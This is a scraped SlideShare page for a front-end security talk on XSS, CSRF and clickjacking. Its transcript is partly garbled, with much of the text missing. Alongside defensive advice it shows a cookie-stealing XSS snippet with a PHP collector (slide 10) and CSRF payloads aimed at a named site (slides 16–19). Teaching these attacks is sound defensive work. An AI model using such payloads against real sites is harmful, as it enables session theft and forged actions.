Your SlideShare is downloading. ×
F2e security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

F2e security

1,881
views

Published on

Published in: Technology, Design

0 Comments
18 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,881
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
207
Comments
0
Likes
18
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. 2
  • 2. 3
  • 3. 4
  • 4. • – – –••
  • 5. Cross-site scripting XSS
  • 6. XSS
  • 7. • Cookie• DOM••…
  • 8. Yupoo XSS
  • 9. alert
  • 10. Javascriptvar img = new Image();img.src = get_cookie.php?var=+encodeURI(document.cookie); PHP<?phpif (isset($_GET[var])) { file_put_contents(./cookie/.time()..txt,urldecode($_GET[var]));}
  • 11. “ ”
  • 12. • Filter input,Escape output• Cookie• noscript?
  • 13. ••
  • 14. • http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/archives/2491• http://ha.ckers.org/xss.html• http://www.xssed.com/
  • 15. CSRF Cross Site Request Forgery
  • 16. <img src=“http://.../del.php?id=64” />
  • 17. <form action="http://jiwai.de/wo/status/update" method="post"> <textarea name="jw_status"></textarea> <input type="submit" /> </form>
  • 18. •• GET POST•
  • 19. setInterval(function() { var img = new Image(); var message = ; var api = http://jiwai.de/wo/status/ update; img.src = api + ?jw_status= + message + &t= + +new Date();}, 1000);
  • 20. “ ”
  • 21. • GET POST Cookie• Referer• Token•
  • 22. • _tb_token_• Referer
  • 23. • http://en.wikipedia.org/wiki/Cross-site_request_forgery• http://www.cgisecurity.com/csrf-faq.html• http://www.80sec.com/csrf-securit.html• http://www.playhack.net/view.php?id=31
  • 24. Twitter Clickjacking
  • 25. 1. iframe Twitter 02. “ ”3. Twitter
  • 26. ••
  • 27. CSRF
  • 28. Cookie Session
  • 29. • “JS ”••
  • 30. Q&A
  • 31. alert(/tHx/).replace(/.+/, eval);